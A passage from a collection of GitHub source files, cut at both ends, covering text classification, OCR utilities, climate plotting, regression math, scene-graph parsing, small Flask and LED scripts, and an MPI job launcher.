filepath_class_pair = self.Tokenizer.split_on_whitespace_from_back(ln)\n filename = self.Tokenizer.split_on_slash_from_back(filepath_class_pair[0])[1]\n filepath_class_pair[1] = self.Tokenizer.strip_newline(filepath_class_pair[1])\n\n result = []\n result.append(filename)\n result.append(filepath_class_pair[0])\n result.append(filepath_class_pair[1])\n filename_path_classnames.append(result)\n\n return filename_path_classnames\n\n \"\"\"\n Gets the list of all the class names in our corpus\n\n Returns a list of [String] class names\n \"\"\"\n def get_class_names(self):\n result = []\n for filename_path_classname in self.fpc:\n candidate_class_name = filename_path_classname[2]\n if candidate_class_name not in result:\n result.append(candidate_class_name)\n return result\n\n \"\"\"\n Gets a list of filenames classified as `class_name`\n\n Returns a list of up to LIMIT (optional) 3-tuples in the format:\n [[doc_name, path_to_doc, class_name], ...]\n for the specified class_name\n \"\"\"\n def get_texts_for_class(self, class_name, LIMIT=None):\n result = []\n for filename_path_classname in self.fpc:\n if filename_path_classname[2] == class_name:\n if LIMIT != None and len(result) > LIMIT:\n break\n else:\n result.append(filename_path_classname)\n return result\n\n \"\"\"\n Retrieves the first N texts from a positive class\n\n Returns a tuple of a\n 1.) dictionary of N positive training entries,\n 2.) dictionary of N positive testing entries the format:\n\n [\n { '[doc_name]' : 'some long string of text...' ... },\n { '[doc_name]' : 'some long string of text...' ... }\n ]\n \"\"\"\n def sample_N_pos_texts(self, pos_fpc, N):\n result_train = {}\n result_test = {}\n count = 0\n\n # Obtain the documents from each class specified in class_names\n # First N documents are sent for training, the remaining are sent for testing\n for fpc in pos_fpc:\n doc_name = fpc[0]\n path_to_doc = fpc[1]\n class_name = fpc[2]\n\n f = open(path_to_doc, 'r', encoding='latin1')\n if count < N:\n result_train[doc_name] = f.read()\n count += 1\n else:\n result_test[doc_name] = f.read()\n\n return (result_train, result_test)\n\n \"\"\"\n Retrieves the first N / len(negative_classes) texts from each of the\n specified list of negative classes\n\n Returns a tuple of a\n 1.) dictionary of N negative training entries,\n 2.) dictionary of N negative testing entries the format:\n\n [\n { '[doc_name]' : 'some long string of text...' ... },\n { '[doc_name]' : 'some long string of text...' ... }\n ]\n \"\"\"\n def sample_N_neg_texts(self, negatives_fpc_map, neg_frac_per_class):\n negative_classes = negatives_fpc_map.keys()\n neg_train_map = {}\n neg_test_map = {}\n\n for class_name in negative_classes:\n N_docs = len(negatives_fpc_map[class_name])\n N_train = int(N_docs * neg_frac_per_class)\n\n for i in range(N_docs):\n # Retrieve elements in fpc 3-tuple\n doc_tuple = negatives_fpc_map[class_name][i]\n doc_name = doc_tuple[0]\n path_to_doc = doc_tuple[1]\n class_name = doc_tuple[2]\n\n f = open(path_to_doc, 'r', encoding='latin1')\n\n if i < N_train:\n neg_train_map[doc_name] = f.read()\n else:\n neg_test_map[doc_name] = f.read()\n\n return (neg_train_map, neg_test_map)\n","repo_name":"NatashaKSS/simple-perceptron-text-classification","sub_path":"DataPrepper(OLD).py","file_name":"DataPrepper(OLD).py","file_ext":"py","file_size_in_byte":15961,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"11027804336","text":"import numpy as np\nimport os, string, unicodedata, gc, torch, torchvision, time, editdistance\nfrom torch import nn\nimport torchvision.transforms as T\nimport matplotlib.pyplot as plt\nfrom importlib import import_module\n\ndef load_function(attr):\n module_, func = attr.rsplit('.', maxsplit=1)\n return getattr(import_module(module_), func)\n\ndef findMaxTextLength(gt_path_train, gt_path_val):\n all_gt_train = os.listdir(gt_path_train)\n all_gt_val = os.listdir(gt_path_val)\n maxlen = 0\n for gt in all_gt_train:\n with open(os.path.join(gt_path_train, gt), 'r', encoding='utf-8') as f:\n text = f.read()\n if len(text) > maxlen:\n maxlen = len(text)\n for gt in all_gt_val:\n with open(os.path.join(gt_path_val, gt), 'r', encoding='utf-8') as f:\n text = f.read()\n if len(text) > maxlen:\n maxlen = len(text)\n print(maxlen)\n maxlen = (int(maxlen / 100) + 2) * 100\n return maxlen\n\ndef generatePlots(train_loss_list, val_loss_list, fig_path):\n if len(train_loss_list) == 0 or len(val_loss_list) == 0:\n print(\"List empty\")\n else:\n min_val_loss = min(val_loss_list)\n epoch = val_loss_list.index(min_val_loss)\n print(f\"Optimal point : {epoch+1} epoch with Val loss {min_val_loss}\")\n plt.plot(range(len(train_loss_list)), train_loss_list, color='blue', label='Train Loss')\n plt.plot(range(len(val_loss_list)), val_loss_list, color='green', label='Valid loss')\n plt.plot(epoch, min_val_loss, marker = 'v', color = 'red', label = 'Optimal point')\n plt.xlabel('Epochs')\n plt.ylabel('Loss')\n plt.title('Loss Summary')\n plt.legend()\n plt.savefig(fig_path)","repo_name":"ayan-cs/bangla-ocr-transformer","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38813586262","text":"from loadOutletRetLevFromNc import getAfricaAndTurkeyMask\n\n#from alphaBetaLab import abFixBasemap\nimport numpy as np\nfrom scipy import stats\nfrom scipy.interpolate import griddata\nfrom matplotlib import pyplot as plt\nfrom matplotlib import gridspec\nimport matplotlib\nfrom mpl_toolkits import basemap as bm\nimport matplotlib as mpl\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable, axes_size\nfrom matplotlib import gridspec\n\nimport netCDF4\n\n\nmodelName = 'CLMcom-CCLM4-8-17_BC_MPI-M-MPI-ESM-LR'\nbslnYear = 1995\n\ndef plotVls(ax, vls, mp, txt, cmap='jet', vmax=None):\n if mp == None:\n #llcrnrlon = -11.5\n #llcrnrlat = 23\n #urcrnrlon = 44\n #urcrnrlat = 74\n llcrnrlon = -25\n llcrnrlat = 31\n urcrnrlon = 37\n urcrnrlat = 71.5\n mp = bm.Basemap(llcrnrlon=llcrnrlon, llcrnrlat=llcrnrlat, urcrnrlon=urcrnrlon, \n urcrnrlat=urcrnrlat, resolution='l', projection='lcc', lon_0=-15, lat_1=-15, lat_2=10)\n\n def getLonLat():\n lonLatFile = 'lonlat.nc'\n ds = netCDF4.Dataset(lonLatFile)\n lon = ds.variables['lon'][:]\n lat = ds.variables['lat'][:]\n return lon, lat\n lon, lat = getLonLat()\n lon, lat = lon.transpose(), lat.transpose()\n x, y = mp(lon, lat)\n\n plt.axes(ax)\n mp.drawcoastlines(linewidth=.25)\n mp.fillcontinents(color=[.95, .95, .95], lake_color=[.95, .95, .95], zorder=0)\n #mp.drawparallels(np.arange(-180, 180, 10), labels=[1,1])\n #mp.drawmeridians(np.arange(-90, 90, 10), labels=[1,1])\n #pcl = mp.pcolor(lon, lat, vls*100, cmap=cmap)\n #pcl = mp.scatter(lon.flatten(), lat.flatten(), .07, c=vls.flatten()*100, cmap=cmap, alpha=1)\n\n tamask, _, _ = getAfricaAndTurkeyMask()\n tamask = tamask.transpose()\n vls[~tamask] = np.nan\n\n cnd = ~np.isnan(vls)\n #xFt = x[cnd]\n #yFt = y[cnd]\n lonFt = lon[cnd]\n latFt = lat[cnd]\n vlsFt = vls[cnd]\n xFt, yFt = mp(lonFt, latFt)\n pcl = plt.scatter(xFt, yFt, .07, c=vlsFt, cmap=cmap, alpha=1, norm=matplotlib.colors.LogNorm())\n divider = make_axes_locatable(ax)\n height = axes_size.AxesX(ax, aspect=1./20)\n pad = axes_size.Fraction(.5, height)\n cax = divider.append_axes(\"bottom\", size=height, pad=pad)\n cb = plt.colorbar(orientation='horizontal', cax=cax)\n if not vmax is None:\n plt.clim(1, vmax)\n #htch = plt.contourf(xgrd, ygrd, signMap, 3, hatches=['', '\\\\\\\\\\\\\\\\\\\\'], alpha=0)\n\n #txtpos = mp(-24, 32)\n txtpos = mp(-22, 69)\n plt.axes(ax)\n plt.annotate(txt, xy=txtpos, xycoords='data', xytext=txtpos, textcoords='data', fontsize=13)\n\n return pcl, cb, mp\n\n\ndef plotHighExtremes(ax, mp):\n retPer = 100\n flpath = '/ClimateRun4/multi-hazard/eva/projection_dis_rcp85_' + modelName + '_wuConst_statistics.nc'\n ds = netCDF4.Dataset(flpath)\n rp = ds.variables['return_period'][:]\n yr = ds.variables['year'][:]\n rl = ds.variables['rl'][rp == retPer, yr == bslnYear, :, :].squeeze()\n ds.close()\n dsuparea = netCDF4.Dataset('upArea.nc')\n upArea = dsuparea.variables['upArea'][:].transpose()\n dsuparea.close()\n rl[upArea < 1e9] = np.nan\n pcl, cb, mp = plotVls(ax, rl, mp, 'a: baseline, $Q_{H100}$', vmax=15000)\n cb.set_label('$Q_{H100}$ ($m^3 s^{-1}$)')\n\n\ndef plotLowExtremes(ax, mp):\n retPer = 15\n flpath = '/ClimateRun4/multi-hazard/eva/projection_dis_rcp85_' + modelName + '_wuConst_statistics.nc'\n ds = netCDF4.Dataset(flpath)\n rp = ds.variables['return_period'][:]\n yr = ds.variables['year'][:]\n rl = ds.variables['rl_min'][rp == retPer, yr == bslnYear, :, :].squeeze()\n ds.close()\n dsuparea = netCDF4.Dataset('upArea.nc')\n upArea = dsuparea.variables['upArea'][:].transpose()\n dsuparea.close()\n rl[upArea < 1e9] = np.nan\n pcl, cb, mp = plotVls(ax, rl, mp, 'c: baseline, $Q_{L15}$', vmax=5000)\n cb.set_label('$Q_{L15}$ ($m^3 s^{-1}$)')\n\n\ndef plotMeans(ax, mp):\n flpath = '/ClimateRun4/multi-hazard/eva/projection_dis_rcp85_' + modelName + '_wuConst_statistics.nc'\n ds = netCDF4.Dataset(flpath)\n rp = ds.variables['return_period'][:]\n yr = ds.variables['year_all'][:]\n iyr = np.where(yr == bslnYear)[0][0]\n rl_ = ds.variables['year_mean'][iyr-14:iyr+14, :, :].squeeze()\n ds.close()\n rl = np.nanmean(rl_, 0)\n dsuparea = netCDF4.Dataset('upArea.nc')\n upArea = dsuparea.variables['upArea'][:].transpose()\n dsuparea.close()\n rl[upArea < 1e9] = np.nan\n pcl, cb, mp = plotVls(ax, rl, mp, 'b: baseline, $Q_{M}$', vmax=10000)\n cb.set_label('$Q_M$ ($m^3 s^{-1}$)')\n return mp\n\n\ndef plotBaseline():\n outPng = 'baseline.png'\n\n f = plt.figure(figsize=(12, 6)) \n gs = gridspec.GridSpec(1, 3)\n\n mp = None\n\n ax0 = plt.subplot(gs[0, 0])\n mp = plotHighExtremes(ax0, mp)\n\n ax1 = plt.subplot(gs[0, 1])\n mp = plotMeans(ax1, mp)\n\n ax2 = plt.subplot(gs[0, 2])\n mp = plotLowExtremes(ax2, mp)\n \n plt.tight_layout()\n\n f.savefig(outPng, dpi=600)\n \n\n\nif __name__ == '__main__':\n import pdb; pdb.set_trace()\n plotBaseline()\n plt.show()\n\n","repo_name":"menta78/lisfloodRunManager","sub_path":"CORDEXRuns/paperHazard3/plotBaseline.py","file_name":"plotBaseline.py","file_ext":"py","file_size_in_byte":4769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39373289182","text":"import numpy as np\n\ndef compute_cost(x,y,theta):\n m = y.size\n predictions = x.dot(theta).flatten()\n sqErrors = (predictions-y)**2\n J = (1.0/(2*m)) * sqErrors.sum()\n return J\n\ndef gradient_descent(x,y, theta, alpha, num_iters):\n m = y.size\n J_history = np.zeros(shape=(num_iters, 1))\n for i in range(num_iters):\n predictions = x.dot(theta).flatten()\n errors_x1 = (predictions - y) * x[:, 0]\n errors_x2 = (predictions - y) * x[:, 1]\n theta[0][0] = theta[0][0] - alpha * (1.0 / m) * errors_x1.sum()\n theta[1][0] = theta[1][0] - alpha * (1.0 / m) * errors_x2.sum()\n\n J_history[i, 0] = compute_cost(X, y, theta)\n return theta, J_history\n\ndef sigmoid(z):\n return 1 / (1+np.exp(-z))\n\ndef sigmoid_cost(x,y, theta):\n theta = np.matrix(theta)\n X = np.matrix(X)\n y = np.matrix(y)\n first = np.multiply(-y, np.log(sigmoid(X * theta.T)))\n second = np.multiply((1 - y), np.log(1 - sigmoid(X * theta.T)))\n return np.sum(first - second) / (len(X))\n\ndef sigmoid_gradient(theta, x, y):\n theta = np.matrix(theta)\n X = np.matrix(X)\n y = np.matrix(y)\n\n parameters = int(theta.ravel().shape[1])\n grad = np.zeros(parameters)\n\n error = sigmoid(X * theta.T) - y\n\n for i in range(parameters):\n term = np.multiply(error, X[:,i])\n grad[i] = np.sum(term) / len(X)\n\n return grad\n","repo_name":"dahalbigyan/matrixwithp","sub_path":"cost_function.py","file_name":"cost_function.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39172553417","text":"import os\nimport json\nimport subprocess\nimport threading\nimport json\nimport numpy as np\nimport ast\nimport tempfile\nimport re\n\n\ndef load_data(filename):\n res = []\n with open(filename, mode='r') as f:\n for line in f:\n json_line = ast.literal_eval(line)\n res.append(json_line)\n return res\n\n\ndef sparse_textual_scene_graph(data, tmp_dir, out_dir, data_mode='train'):\n \"\"\"\n to parse textual scene graph by using SPICE, see more information in https://github.com/peteanderson80/SPICE\n :param data:\n :return:\n \"\"\"\n # Prepare temp input file for the SPICE scorer\n input_data = []\n for id, instance in enumerate(data):\n _temp = ' '.join(instance['token'])\n img_id = instance['img_id']\n input_data.append({\n \"image_id\": img_id,\n \"test\": _temp,\n \"refs\": [_temp]\n })\n\n cwd = os.path.dirname(os.path.abspath(__file__))\n temp_dir = os.path.join(cwd, tmp_dir)\n if not os.path.exists(temp_dir):\n os.makedirs(temp_dir)\n in_file = tempfile.NamedTemporaryFile(delete=False, dir=temp_dir, mode='w')\n json.dump(input_data, in_file, indent=2)\n in_file.close()\n\n # cwd = os.path.dirname(os.path.abspath(__file__))\n # temp_dir = os.path.join(cwd, tmp_dir)\n # if not os.path.exists(temp_dir):\n # os.makedirs(temp_dir)\n # in_file = os.path.join(tmp_dir, data_mode)\n # with open(in_file, mode='w') as f:\n # json.dump(input_data, f, indent=2)\n\n # Start job\n SPICE_JAR = 'spice-1.0.jar'\n temp_dir = os.path.join(cwd, out_dir)\n if not os.path.exists(temp_dir):\n os.makedirs(temp_dir)\n out_file = os.path.join(temp_dir, data_mode+'.json')\n spice_cmd = ['java', '-jar', '-Xmx8G', SPICE_JAR, in_file.name,\n '-out', out_file,\n '-detailed',\n '-subset',\n '-silent'\n ]\n subprocess.check_call(spice_cmd, cwd=os.path.dirname(os.path.abspath(__file__)))\n\n # Read and process results\n with open(out_file, mode='r') as data_file:\n results = json.load(data_file)\n return results\n\n\ndef get_index(data, target_name):\n start_token = target_name.split()[0]\n end_token = target_name.split()[-1]\n start_index = data.index(start_token)\n end_index = data.index(end_token)\n return start_index, end_index\n\n\ndef combine(meta_data, tuple_data, target_file):\n \"\"\"\n combine scene graph and meta data\n :param meta_data: the original data\n :param tuple_data: the parsed SG data\n :param target_file: the target file which saves the final scene graph\n :return:\n \"\"\"\n\n assert len(tuple_data) == len(meta_data)\n for sg, md in zip(tuple_data, meta_data):\n # md['tuples'] = sg['test_tuples']\n _temp_sg = sg['test_tuples']\n obj = []\n attr = []\n relation = []\n for i in _temp_sg:\n if len(i['tuple']) == 1:\n # object\n obj.append(i['tuple'])\n elif len(i['tuple']) == 2:\n # attributes\n attr.append(i['tuple'])\n elif len(i['tuple']) == 3:\n relation.append(i['tuple'])\n else:\n raise EOFError('no SG obtained')\n md['TSG'] = {'obj': obj, 'attr': attr, 'rel': relation}\n\n with open(target_file, 'w', encoding='utf-8') as f:\n json.dump(meta_data, f)\n\n\nif __name__ == '__main__':\n print('parsing textual scene graph')\n FILE_DIR = '../data/txt/'\n INPUT_TMP_DIR = '../data/spice/input/'\n OUTPUT_DIR = '../data/spice/output/'\n DIST_DIR = '../data/tsg/'\n\n for i in ['ours_train.txt', 'ours_val.txt', 'ours_test.txt']:\n print(f'parsing {i} ... ')\n base_name = os.path.basename(i).split('.')[0]\n data = load_data(os.path.join(FILE_DIR, i))\n sg_data = sparse_textual_scene_graph(data, tmp_dir=INPUT_TMP_DIR, out_dir=OUTPUT_DIR,\n data_mode=base_name)\n combine(data, sg_data, os.path.join(DIST_DIR, f'{base_name}.json'))\n\n # print('parsing train data ... ')\n # train_data = load_data(os.path.join(FILE_DIR, 'ours_train.txt'))\n # train_tuple_data = sparse_textual_scene_graph(train_data, tmp_dir=INPUT_TMP_DIR, out_dir=OUTPUT_DIR, data_mode='train')\n # combine(train_data, train_tuple_data, os.path.join(DIST_DIT, 'train.json'))\n #\n # print('parsing valid data ... ')\n # vaild_data = load_data(os.path.join(FILE_DIR, 'ours_val.txt'))\n # valid_tuple_data = sparse_textual_scene_graph(train_data, tmp_dir=INPUT_TMP_DIR, out_dir=OUTPUT_DIR, data_mode='vaild')\n # combine(vaild_data, valid_tuple_data, os.path.join(DIST_DIT, 'val.json'))\n #\n # print('parsing test data ... ')\n # test_data = load_data(os.path.join(FILE_DIR, 'ours_test.txt'))\n # test_tuple_data = sparse_textual_scene_graph(train_data, tmp_dir=INPUT_TMP_DIR, out_dir=OUTPUT_DIR, data_mode='test')\n # combine(test_data, test_tuple_data, os.path.join(DIST_DIT, 'test.json'))\n\n\n\n\n\n\n\n\n","repo_name":"ChocoWu/MRE-ISE","sub_path":"TSG/textual_scene_graph.py","file_name":"textual_scene_graph.py","file_ext":"py","file_size_in_byte":5031,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"27576471717","text":"class Solution(object):\n def lengthOfLongestSubstring(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n \n # take a sliding window approach\n # use two pointers. right pointer (j_ expands the window)\n # if element not in set, add and iterate right pointer\n # otherwise remove current elemnt and update left pointer\n \n \n i = 0\n j = 0\n max_len = 0\n h = set()\n \n while j < len(s):\n if s[j] not in h:\n h.add(s[j])\n max_len = max(max_len, len(h))\n j += 1\n else: \n h.remove(s[i])\n i += 1\n return max_len","repo_name":"allenchng/Bit-O-Code","sub_path":"leetcode/Python/Leetcode 3 Longest Substring Without Repeating Characters.py","file_name":"Leetcode 3 Longest Substring Without Repeating Characters.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39966237804","text":"\nimport cordinates\nimport Legalm\n\n\n\ncords = cordinates.getValues()\n\n\n\nwpa=cords[0]\nwpb=cords[1]\nwpc=cords[2]\nwpd=cords[3]\nwpe=cords[4]\nwpf=cords[5]\nwpg=cords[6]\nwph=cords[7]\nwra=cords[16]\nwnb=cords[26]\nwbc=cords[28]\nwq=cords[20]\nwk=cords[22]\nwbf=cords[29]\nwng=cords[27]\nwrh=cords[17]\n\nbpa=cords[8]\nbpb=cords[9]\nbpc=cords[10]\nbpd=cords[11]\nbpe=cords[12]\nbpf=cords[13]\nbpg=cords[14]\nbph=cords[15]\nbra=cords[18]\nbnb=cords[25]\nbbc=cords[30]\nbq=cords[21]\nbk=cords[23]\nbbf=cords[31]\nbng=cords[24]\nbrh=cords[19]\n\n\n\n\ndef LMFPGC(x,y):\n\t\n\tbl = Legalm.black_moves(wpa,wpb,wpc,wpd,wpe,wpf,wpg,wph,bpa,bpb,bpc,bpd,bpe,bpf,bpg,bph,wra,wrh,bra,brh,wq,bq,wk,bk,bng,bnb,wnb,wng,wbc,wbf,bbc,bbf)\n\twl = Legalm.white_moves(wpa,wpb,wpc,wpd,wpe,wpf,wpg,wph,bpa,bpb,bpc,bpd,bpe,bpf,bpg,bph,wra,wrh,bra,brh,wq,bq,wk,bk,bng,bnb,wnb,wng,wbc,wbf,bbc,bbf)\n\t\n\tcords = (x, y)\n\t\n\treturning = []\n\tfor i in range(len(wl)):\n\t\t\n\t\tif wl[i] == cords:\n\t\t\t\n\t\t\tif i % 2 == 0:\n\t\t\t\treturning.append(wl[i+1])\n\tfor i in range(len(bl)):\n\t\tif bl[i] == cords:\n\t\t\tif i % 2 == 0:\n\t\t\t\treturning.append(bl[i+1])\n\treturn(returning)\n\t\t\t\n\t\t\t\n\n\n\n\n","repo_name":"QuadraticStudios/Chess-bot","sub_path":"LMFPGC.py","file_name":"LMFPGC.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72271384487","text":"import torch\n\n\ndef exponent_assign_and_check(mod, exponent):\n if not isinstance(exponent, int):\n assert (\n exponent.numel() == 1\n ), \"Only support power which exponent is scalar\"\n if mod.exponent is None:\n mod.exponent = exponent\n else:\n assert mod.exponent == exponent, (\n f\"This Pow is only used for exponent {mod.exponent}, \"\n f\"but get {exponent}\"\n )\n\n\nclass Pow(torch.nn.Module):\n \"Module implementation of torch.pow\"\n\n def __init__(self):\n super(Pow, self).__init__()\n self.exponent = None\n\n def forward(self, data, exponent):\n exponent_assign_and_check(self, exponent)\n return torch.pow(data, exponent)\n","repo_name":"xingyun-xy/cap","sub_path":"changan_plugin_pytorch/nn/pow.py","file_name":"pow.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15755040758","text":"import random\nfrom flask import Flask, jsonify # flask 패키지에서 Flask class를 호출\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n return 'Hi'\n\n@app.route('/pick_lotto') # @ - decorator 밑에 정의되어 있는 함수를 실행해라 라는 의미가 포함되어 있음.\ndef pick_lotto():\n numbers = random.sample(range(1, 46), 6)\n return jsonify(numbers)\n\n@app.route('/hi/') #variable routing\ndef hi(name):\n return (f'hi {name}!')\n\n@app.route('/dictionary/')\ndef dictionary(word):\n my_dict = {\n 'apple': '사과',\n 'banana': '바나나',\n 'melon': '멜론'\n }\n if word in my_dict:\n return f'{word}은(는) {my_dict[word]}!'\n else:\n return f'{word}은(는) 나만의 단어장에는 없는 단어입니다.'\n\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"Nenemttin/TIL","sub_path":"04_flask/first_app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36758921214","text":"import matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\n\r\n# prepare data\r\ndef f(x, y):\r\n return x**2 + y**2 + x * y\r\n\r\nX, Y = np.mgrid[-3:3, -3:3]\r\n\r\nprint('X:\\n', X)\r\nprint()\r\nprint('Y:\\n', Y)\r\nprint()\r\n\r\nZ = f(X, Y)\r\nprint('Z:\\n', Z)\r\nprint()\r\n\r\nfig = plt.figure(figsize=(9, 4))\r\n\r\n# Create contour lines.\r\nax1 = fig.add_subplot(121)\r\nax1.set_title('contour')\r\ncontour = ax1.contourf(X, Y, Z)\r\nprint(type(contour)) # \r\n\r\n# Create a 3D graph.\r\nax2 = fig.add_subplot(122, projection='3d')\r\nax2.set_title('surface')\r\nax2.plot_surface(X, Y, Z)\r\n\r\nplt.show()","repo_name":"munezou/VsCodeProject","sub_path":"Python/Normal/matplotlib/matplotlib_contourf.py","file_name":"matplotlib_contourf.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74984587047","text":"import board\nimport neopixel\nimport time\nimport math\nimport random\nimport sys\n\nbpc = 8\nvpc = 2 ** bpc\nvpp = vpc - 1\nsemicol = 2 * vpp\ntotalcol = 3 * vpp\ncount = 300\nspeed = 300\ndirection = 1\nstart = 88\nend = 299\ndesiredLength = end - start + 1\ninc = len(sys.argv) - 4\n\npresets = {\"red\":[(255,0,0)],\"green\":[(0,255,0)],\"blue\":[(0,0,255)],\n \"magenta\":[(255,0,255)],\"yellow\":[(255,255,0)],\"cyan\":[(0,255,255)],\n \"purple\":[(95,0,255)],\"orange\":[(255,127,0)],\n \"vapor\":[(0,255,127),(0,127,255),(127,0,255),(255,0,255)],\n \"rainbow\":[(255,0,0),(255,255,0),(0,255,0),(0,255,255),(0,0,255),(255,0,255)],\"watermelon\":[(255,0,63),(0,255,63)]}\n\ndef colClamp(num,mini=0,maxi=255):\n return min(max(num,mini),maxi)\n\ncardinals = []\n\nfor i in range(4,inc + 4):\n if(sys.argv[i] in presets):\n for j in presets[sys.argv[i]]:\n cardinals.append(j)\n else:\n col = sys.argv[i].split(\",\")\n cardinals.append(tuple([int(x) for x in col]))\n\ninc = len(cardinals)\n\nif(sys.argv[1] == \"true\" and inc > 2):\n for i in range(inc - 2,0,-1):\n if(cardinals[i] in presets):\n for j in presets[cardinals[i]]:\n cardinals.append(j)\n else:\n cardinals.append(cardinals[i])\n inc = (inc * 2) - 2\n\nif(sys.argv[2] == \"full\"):\n lpg = round(desiredLength / inc)\nelif(sys.argv[2] == \"part\"):\n lpg = round(desiredLength / ((inc + 2) / 2))\nelif(sys.argv[2] == \"half\"):\n lpg = round(desiredLength / (((inc + 2) / 2) - 1))\nelse:\n lpg = round(desiredLength / (inc * float(sys.argv[2])))\nlpg = max(lpg,1)\n\nprint(cardinals)\n\nlength = lpg * inc\nwait = ((speed / length) - (speed / length * 0.1))\n\norder = neopixel.GRB\nbrightness = float(sys.argv[3])\nbright = round(1/brightness)\n\npixels = neopixel.NeoPixel(board.D21,count,brightness=0.5,auto_write=False)\n\ncolors = []\n\nfor i in range(inc):\n rInc = (cardinals[i][0] - cardinals[(i + 1) % inc][0]) / lpg\n gInc = (cardinals[i][1] - cardinals[(i + 1) % inc][1]) / lpg\n bInc = (cardinals[i][2] - cardinals[(i + 1) % inc][2]) / lpg\n\n for j in range(lpg):\n r = round(cardinals[i][0] - (rInc * j))\n g = round(cardinals[i][1] - (gInc * j))\n b = round(cardinals[i][2] - (bInc * j))\n\n colors.append((r,g,b))\n\nprint(colors)\n\nfor i in range(start):\n pixels[i] = (0,0,0)\n\nif direction > 0:\n rng = (0,length,1)\nelse:\n rng = (length-1,-1,-1)\nwhile True:\n for i in range(*rng):\n for j in range(start,end+1):\n k = round((j + i) % length)\n if(j % bright == 0):\n pixels[j] = colors[k]\n pixels.show()\n time.sleep(wait)\n","repo_name":"JacobHutch/LEDLights","sub_path":"gradient.py","file_name":"gradient.py","file_ext":"py","file_size_in_byte":2636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12467252929","text":"import itertools\nimport os\n\nnCpusList = [1, 2, 4, 8, 16, 32, 64]\nsizesList = [512, 1024, 1536, 2048, 2560]\n\nos.system(\"mpixlC -o prog MPI.cpp\")\n\nfor nCpus in nCpusList:\n for size in sizesList:\n for v in range(3):\n fName = str(nCpus) + \"_\" + str(size) + \"_\" + str(v)\n\n if os.path.exists(fName + \".out\") or os.path.exists(fName + \".err\"):\n continue\n\n os.system(\"mpisubmit.pl -p \" + str(nCpus) + \" -w 00:15\" + \\\n \" -stdout \" + fName + \".out\" + \\\n \" -stderr \" + fName + \".err\" + \\\n \" prog -- \" + str(size))","repo_name":"popandopulogeo/ribbon_matrix_multiplication_CMC","sub_path":"MPI/launchPolus.py","file_name":"launchPolus.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38795130172","text":"from collections import Counter\n\n\ndef findSubstring(self, s, words):\n if not s or not words:\n return []\n # 所有给定子串的长度都一样\n one_word = len(words[0])\n # 所有子串长度的总和\n all_len = len(words) * one_word\n n = len(s)\n words = Counter(words)\n res = []\n for i in range(n - all_len + 1):\n tmp = s[i:i+all_len]\n c_tmp = []\n # 每次跳oneword长度\n for j in range(0, all_len, one_word):\n c_tmp.append(tmp[j:j+one_word])\n if Counter(c_tmp) == words:\n res.append(i)\n return res\n\n\ncolors = ['red', 'blue', 'red', 'green', 'blue', 'blue']\nc = Counter(colors)\nprint(dict(c))\nprint(c['blue'])\ndel c['red']\nprint(list(c.elements()))\nprint(c.most_common(3))\n# +-&|\n","repo_name":"saycmily/vtk-and-python","sub_path":"leecode/1-500/1-100/30-串联所有单词的子串.py","file_name":"30-串联所有单词的子串.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8770081890","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 20 13:08:40 2017\n\n@author: Atlas\n\"\"\"\n\ndef cipher(map_from, map_to, code):\n \"\"\" map_from, map_to: strings where each contain \n N unique lowercase letters. \n code: string (assume it only contains letters also in map_from)\n Returns a tuple of (key_code, decoded).\n key_code is a dictionary with N keys mapping str to str where \n each key is a letter in map_from at index i and the corresponding \n value is the letter in map_to at index i. \n decoded is a string that contains the decoded version \n of code using the key_code mapping. \"\"\"\n\n key_code = {}\n decoded = ''\n for i in range(len(map_from)):\n key_code[map_from[i]] = map_to[i]\n \n for letter in code:\n try: \n decoded = decoded + (list(key_code.keys())[list(key_code.values()).index(letter)])\n except:\n decoded = decoded + letter\n return key_code, decoded \n\n\nprint(cipher(\"abcde\", \"dcbaf\", \"dab\"))\n#cipher(\"abcd\", \"dcba\", \"dab\") \n#returns (order of entries in dictionary may not be the same) \n#({'a':'d', 'b': 'c', 'd': 'a', 'c': 'b'}, 'adc')\n\n# This took 4/20 points","repo_name":"atlasbc/mit_6001x","sub_path":"final/cipher.py","file_name":"cipher.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"34825206752","text":"import socket, subprocess\n\nPORT = '8000'\n\ndef get_ip_address():\n '''Return IP adress'''\n hostname = socket.gethostname()\n ip_address = socket.gethostbyname(hostname)\n return ip_address\n\n\ndef 